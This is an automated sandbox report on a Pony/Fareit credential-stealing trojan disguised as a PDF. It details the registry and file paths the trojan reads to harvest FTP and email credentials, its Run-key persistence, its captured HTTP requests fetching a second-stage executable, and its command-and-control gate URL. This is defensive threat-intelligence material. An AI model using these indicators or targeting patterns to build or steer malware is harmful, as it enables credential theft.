TT93846563647_pdf.exe

This report is generated from a file or URL submitted to this webservice on March 6th 2017 14:05:50 (UTC) and action script Heavy Anti-Evasion.
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v6.20 © Hybrid Analysis

Incident Response

Risk Assessment

- Credential Stealer
  - Scans for artifacts that may help identify the target
  - Touched instant messenger related registry keys
  - Tries to steal FTP credentials
- Persistence
  - Modifies auto-execute functionality by setting/creating a value in the registry
- Fingerprint
  - Reads the active computer name
  - Scans for artifacts that may help identify the target
- Evasive
  - Possibly checks for the presence of an Antivirus engine
- Spreading
  - Tries to access unusual system drive letters
- Network Behavior
  - Contacts 2 domains and 1 host.

Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators 12

Anti-Detection/Stealthiness

- Creates a resource fork (ADS) file (often used to hide data)
  - details: "<Input Sample>" created file "%APPDATA%\java.exe\:Zone.Identifier:$DATA"
  - source: API Call
  - relevance: 8/10

External Systems

- Detected Emerging Threats Alert
  - details:
    - Detected alert "ET TROJAN Fareit/Pony Downloader Checkin 3" (SID: 2014234, Rev: 10, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
    - Detected alert "ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System" (SID: 2007695, Rev: 21, Severity: 1) categorized as "Potential Corporate Privacy Violation"
    - Detected alert "ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98" (SID: 2014562, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
    - Detected alert "ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5." (SID: 2016870, Rev: 11, Severity: 1) categorized as "Potential Corporate Privacy Violation"
    - Detected alert "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious" (SID: 2021697, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
    - Detected alert "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious" (SID: 2022239, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
  - source: Suricata Alerts
  - relevance: 10/10
- Sample was identified as malicious by a large number of Antivirus engines
  - details: 12/59 Antivirus vendors marked sample as malicious (20% detection rate)
  - source: External System
  - relevance: 10/10
- Sample was identified as malicious by at least one Antivirus engine
  - details: 12/59 Antivirus vendors marked sample as malicious (20% detection rate)
  - source: External System
  - relevance: 8/10

Network Related

- Malicious artifacts seen in the context of a contacted host
  - details: Found malicious artifacts related to "166.62.27.56" (ASN: 26496, Owner: GoDaddy.com, LLC): ...
  - source: Network Traffic
  - relevance: 10/10

Pattern Matching

- YARA signature match
  - details: YARA signature "pony" classified process "TT93846563647_pdf.exe" as "trojan,pony" based on indicators: "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X},YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0,POST %s HTTP/1.0,Accept-Encoding: identity, *;q=0" (Author: Brian Wallace @botnet_hunter)
  - source: YARA Signature
  - relevance: 10/10

Spyware/Information Retrieval

- Scans for artifacts that may help identify the target
  - details:
    - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
    - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
    - "<Input Sample>" (Path: "HKCU\IDENTITIES\{57AB3677-534E-4173-8F92-6566F6F82F10}\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
    - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\OUTLOOK\OMI ACCOUNT MANAGER\ACCOUNTS")
  - source: Registry Access
  - relevance: 3/10
- Touched instant messenger related registry keys
  - details: "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
  - source: Registry Access
  - relevance: 5/10
- Tries to steal FTP credentials
  - details:
    - "Software\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
    - "RushSite.xml" (Indicator: "rushsite.xml")
  - source: String
  - relevance: 6/10

Unusual Characteristics

- Checks for a resource fork (ADS) file
  - details: "<Input Sample>" checked file "C:\TT93846563647_pdf.exe\:Zone.Identifier:$DATA"
  - source: API Call
  - relevance: 5/10
- Tries to access unusual system drive letters
  - details:
    - "<Input Sample>" touched "K:\"
    - "<Input Sample>" touched "L:\"
    - "<Input Sample>" touched "M:\"
    - "<Input Sample>" touched "N:\"
    - "<Input Sample>" touched "O:\"
    - "<Input Sample>" touched "P:\"
    - "<Input Sample>" touched "Q:\"
    - "<Input Sample>" touched "R:\"
    - "<Input Sample>" touched "S:\"
    - "<Input Sample>" touched "T:\"
    - "<Input Sample>" touched "U:\"
    - "<Input Sample>" touched "V:\"
    - "<Input Sample>" touched "W:\"
    - "<Input Sample>" touched "X:\"
    - "<Input Sample>" touched "Y:\"
  - source: API Call
  - relevance: 9/10

Hiding 1 malicious indicator: all indicators are available only in the private webservice or standalone version.

Suspicious Indicators 20

Environment Awareness

- Reads the active computer name
  - details: "<Input Sample>" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - source: Registry Access
  - relevance: 5/10

General

- Opened the service control manager
  - details: "<Input Sample>" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  - source: API Call
  - relevance: 10/10
- Reads configuration files
  - details: "<Input Sample>" read file "%APPDATA%\Mozilla\Firefox\profiles.ini"
  - source: API Call
  - relevance: 4/10
- Requested access to a system service
  - details:
    - "<Input Sample>" called "OpenService" to access the "ProtectedStorage" service
    - "<Input Sample>" called "OpenService" to access the "ProtectedStorage" service requesting "SERVICE_START" (0X10) access rights
  - source: API Call
  - relevance: 10/10
- Sent a control code to a service
  - details: "<Input Sample>" called "ControlService" and sent control code "0X400" to the service "ProtectedStorage"
  - source: API Call
  - relevance: 10/10

Installation/Persistence

- Modifies auto-execute functionality by setting/creating a value in the registry
  - details:
    - "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
    - "<Input Sample>" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "TT93846563647_PDF.EXE"; Value: "%APPDATA%\java.exe")
  - source: Registry Access
  - relevance: 8/10

Network Related

- Found potential IP address in binary/memory
  - details:
    - "166.62.27.56"
    - "2.5.29.37"
  - source: String
  - relevance: 3/10
- Uses a User Agent typical for browsers, although no browser was ever launched
  - details: Found user agent(s): Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  - source: Network Traffic
  - relevance: 10/10

Spyware/Information Retrieval

- Checks on FTP client related files
  - details:
    - "<Input Sample>" opened file "C:\Program Files\Common Files\Ipswitch\WS_FTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "%APPDATA%\SmartFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "%ALLUSERSPROFILE%\SmartFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "%APPDATA%\TurboFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "C:\ProgramData\TurboFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "%APPDATA%\VanDyke\Config\Sessions\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "C:\ProgramData\VanDyke\Config\Sessions\" (DesiredAccess: 1048577, OpenOptions: 16417)
    - "<Input Sample>" opened file "%APPDATA%\FTPRush\" (DesiredAccess: 1048577, OpenOptions: 16417)
  - source: API Call
  - relevance: 8/10
- Contains ability to enumerate processes/modules/threads
  - details: CreateToolhelp32Snapshot@KERNEL32.DLL from TT93846563647_pdf.exe (PID: 3036)
  - source: Hybrid Analysis Technology
  - relevance: 5/10

System Destruction

- Opens file with deletion access rights
  - details: "<Input Sample>" opened "%APPDATA%\java.exe" with delete access
  - source: API Call
  - relevance: 7/10

System Security

- Modifies proxy settings
  - details:
    - "<Input Sample>" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
    - "<Input Sample>" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - source: Registry Access
  - relevance: 10/10
- Queries sensitive IE security settings
  - details: "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  - source: Registry Access
  - relevance: 8/10

Unusual Characteristics

- Imports suspicious APIs
  - details: URLDownloadToFileA, RegOpenKeyExA, RegCloseKey, GetTempPathA, WriteFile, CopyFileA, GetModuleFileNameA, LoadLibraryExA, UnhandledExceptionFilter, GetModuleHandleA, CreateThread, GetTickCount, GetVersionExA, LoadLibraryA, GetStartupInfoA, GetProcAddress, FindFirstFileA, CreateFileA, WinExec, LockResource, GetCommandLineA, Sleep, FindResourceA, VirtualAlloc, ShellExecuteA, GetLastActivePopup, SetWindowsHookExA, FindWindowA, GetWindowThreadProcessId
  - source: Static Parser
  - relevance: 1/10
- Reads information about supported languages
  - details:
    - "<Input Sample>" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
    - "<Input Sample>" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "LOCALENAME")
    - "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - source: Registry Access
  - relevance: 3/10

Hiding 5 suspicious indicators: all indicators are available only in the private webservice or standalone version.

Informative 18

Environment Awareness

- Contains ability to query the machine version
  - details: GetVersionExA@KERNEL32.DLL from TT93846563647_pdf.exe (PID: 3036)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
- Queries volume information
  - details:
    - "<Input Sample>" queries volume information of "D:\" at 00047968-00003168-0000010C-109079707
    - "<Input Sample>" queries volume information of "C:\share" at 00047968-00003168-0000010C-109082152
  - source: API Call
  - relevance: 2/10
- Queries volume information of an entire harddrive
  - details: "<Input Sample>" queries volume information of "D:\" at 00047968-00003168-0000010C-109079707
  - source: API Call
  - relevance: 8/10

General

- Accesses System Certificates Settings
  - details: "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
  - source: Registry Access
  - relevance: 10/10
- Contacts domains
  - details:
    - "www.tamansimalem.com"
    - "tamansimalem.com"
  - source: Network Traffic
  - relevance: 1/10
- Contacts server
  - details: "166.62.27.56:80"
  - source: Network Traffic
  - relevance: 1/10
- Creates mutants
  - details:
    - "\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
    - "\Sessions\1\BaseNamedObjects\Local\c:!users!i2tg58a!appdata!roaming!microsoft!windows!cookies!"
    - "\Sessions\1\BaseNamedObjects\Local\c:!users!i2tg58a!appdata!local!microsoft!windows!history!history.ie5!"
    - "\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
    - "\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
    - "\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
    - "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
    - "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
    - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
    - "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
    - "\Sessions\1\BaseNamedObjects\Local\c:!users!i2tg58a!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
  - source: Created Mutant
  - relevance: 3/10
- GETs files from a webserver
  - details:
    - "GET /wp-admin/network/shit.exe HTTP/1.0
      Host: tamansimalem.com
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Connection: close
      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
    - "GET /wp-admin/network/shit.exe HTTP/1.0
      Host: www.tamansimalem.com
      Accept: */*
      Accept-Encoding: identity, *;q=0
      Connection: close
      User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
  - source: Network Traffic
  - relevance: 5/10
- Runs shell commands
  - details: "cmd /c ""%TEMP%\4127192.bat" "C:\TT93846563647_pdf.exe" "" on 2017-3-6.06:33:00.250
  - source: Monitored Target
  - relevance: 5/10
- Spawns new processes
  - details:
    - Spawned process "<Input Sample>"
    - Spawned process "<Input Sample>"
    - Spawned process "cmd.exe" with commandline "cmd /c ""%TEMP%\4127192.bat" "C:\TT93846563647_pdf.exe" ""
  - source: Monitored Target
  - relevance: 3/10

Installation/Persistence

- Connects to LPC ports
  - details: "<Input Sample>" connecting to "\ThemeApiPort"
  - source: API Call
  - relevance: 1/10
- Dropped files
  - details: "4127192.bat" has type "ASCII text with CRLF CR line terminators"
  - source: Binary File
  - relevance: 3/10
- Touches files in the Windows directory
  - details:
    - "<Input Sample>" touched file "%WINDIR%\Fonts\staticcache.dat"
    - "<Input Sample>" touched file "%WINDIR%\system32\en-US\user32.dll.mui"
    - "<Input Sample>" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
    - "<Input Sample>" touched file "%WINDIR%\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7600.16385_en-us_020378a8991bbcc2\comctl32.dll.mui"
    - "<Input Sample>" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
    - "<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
    - "<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
    - "<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
    - "<Input Sample>" touched file "%WINDIR%\wcx_ftp.ini"
    - "<Input Sample>" touched file "%WINDIR%\32BitFtp.ini"
  - source: API Call
  - relevance: 7/10

Network Related

- Found potential URL in binary/memory
  - details:
    - Heuristic match: "Font.Name"
    - Pattern match: "http://matrix.kladovka.net.ru"
    - Heuristic match: "mailto:matrix@kladovka.net.ru"
    - Pattern match: "http://tamansimalem.com/wp-admin/network/gate.php"
    - Pattern match: "http://www.facebook.com/"
    - Heuristic match: "\RhinoSoft.com"
    - Pattern match: "http://www.ibsensoftware.com/"
    - Pattern match: "http://tamansimalem.com/wp-admin/network/shit.exe"
  - source: String
  - relevance: 10/10

Spyware/Information Retrieval

- Found a reference to a known community page
  - details:
    - "http://www.facebook.com/" (Indicator: "facebook.com")
    - "myspace1" (Indicator: "myspace")
  - source: String
  - relevance: 7/10

System Security

- Opens the Kernel Security Device Driver (KsecDD) of Windows
  - details: "<Input Sample>" opened "\Device\KsecDD"
  - source: API Call
  - relevance: 10/10

Unusual Characteristics

- Found Delphi 4 - Delphi 2006 artifact
  - details: "TT93846563647_pdf.exe.bin" has a PE timestamp using the buggy magic timestamp 0x2A425E19.
  - source: Static Parser
  - relevance: 10/10
- Matched Compiler/Packer signature
  - details: "TT93846563647_pdf.exe.bin" was detected as "Borland Delphi 4.0"
  - source: Static Parser
  - relevance: 10/10

File Details

- Filename: TT93846563647_pdf.exe
- Size: 1.9MiB (2000000 bytes)
- Type: peexe executable
- Description: PE32 executable (GUI) Intel 80386, for MS Windows
- Architecture: WINDOWS
- SHA256: befed3d3447792ccd490ff42394590b77a9bf76f1d2ecbeff10b2339672d8a45
- MD5: dbc281b5540ee551ac11759c17810087
- SHA1: edf164da7d7642bc215b00905bc148625971f497
- ssdeep: 12288:NcXnG/tKENyGFrt6hWmINDbgUrBOnsX8AZERPQ9hSftysKkRllUQBI8YpfvkrGia:NcXGjF5tRlJ90IMcMR/jBI8Y5vAC0e
- imphash: fa9304cdfa2a7cab0199775cffab3cd5
- authentihash: 3b128383a3d814745efc7cb9d0658cce72672b7243d7d206eac168f8a7ee508e
- Compiler/Packer: Borland Delphi 4.0

Classification (TrID)
- 37.4% (.EXE) Win32 Executable Delphi generic
- 34.5% (.SCR) Windows screen saver
- 11.9% (.EXE) Win32 Executable (generic)
- 5.4% (.EXE) Win16/32 Executable Delphi generic
- 5.2% (.EXE) Generic Win/DOS Executable
Hybrid Analysis
Analysed 4 processes in total (System Resource Monitor).

- TT93846563647_pdf.exe (PID: 2748)
- TT93846563647_pdf.exe (PID: 3036)
- cmd.exe cmd /c ""%TEMP%\4127192.bat" "C:\TT93846563647_pdf.exe" " (PID: 3420)
- TT93846563647_pdf.exe (PID: 3168)

Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
www.tamansimalem.com | 166.62.27.56 | - | United States |
tamansimalem.com | 166.62.27.56 | - | United States |
Contacted Hosts

IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
166.62.27.56 | 80 TCP | tt93846563647_pdf.exe PID: 3036 | United States, ASN: 26496 (GoDaddy.com, LLC) |
HTTP Traffic

Endpoint | Method | URL | Request | Response |
---|---|---|---|---|
166.62.27.56:80 | GET | 166.62.27.56/wp-admin/network/shit.exe | GET /wp-admin/network/shit.exe HTTP/1.0; Host: tamansimalem.com; Accept: */*; Accept-Encoding: identity, *;q=0; Connection: close; User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | 301 Moved Permanently |
166.62.27.56:80 | GET | 166.62.27.56/wp-admin/network/shit.exe | GET /wp-admin/network/shit.exe HTTP/1.0; Host: www.tamansimalem.com; Accept: */*; Accept-Encoding: identity, *;q=0; Connection: close; User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) | 302 Moved Temporarily |
Memory Forensics
String | Context | Stream UID |
---|---|---|
http://www.facebook.com/ | Domain/IP reference | 00047896-00003036-60600-376-0040A875 |
http://tamansimalem.com/wp-admin/network/gate.php | Domain/IP reference | 00047896-00003036-60600-12-0040FD60 |
rhinosoft.com | Domain/IP reference | 00047896-00003036-60600-353-00408FD3 |
softx.org | Domain/IP reference | 00047896-00003036-60600-314-00407685 |
2.5.29.37 | Domain/IP reference | 00047896-00003036-60600-436-0040D3BE |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 3 | 2014234 |
local -> 166.62.27.56:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System | 2007695 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 | 2014562 |
local -> 166.62.27.56:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5. | 2016870 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 2021697 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 2022239 |
Extracted Files

Informative Selection 1

- 4127192.bat
  - Size: 94B (94 bytes)
  - Type: ASCII text, with CRLF, CR line terminators
  - Runtime Process: cmd.exe (PID: 3420)
  - MD5: 3880eeb1c736d853eb13b44898b718ab
  - SHA1: 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6
  - SHA256: 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7